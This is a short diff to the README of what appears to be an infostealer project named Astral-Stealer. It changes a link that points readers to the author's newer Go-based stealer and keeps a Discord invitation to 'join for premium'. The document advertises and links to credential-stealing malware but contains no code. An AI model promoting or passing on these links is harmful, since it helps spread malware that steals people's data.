freeman649/Astral-Stealer/README.md

 </h1>

 <h1 align="center">
-  The project will not be updated but I made a better stealer in golang [Thief Cat](https://github.com/freeman649/Thief-Cat)
+  The project will not be updated but I made a better stealer in golang https://github.com/freeman649/Thief-Cat
 </h1>

 ##### [Join for premium](https://discord.gg/bFYcmjbFdw)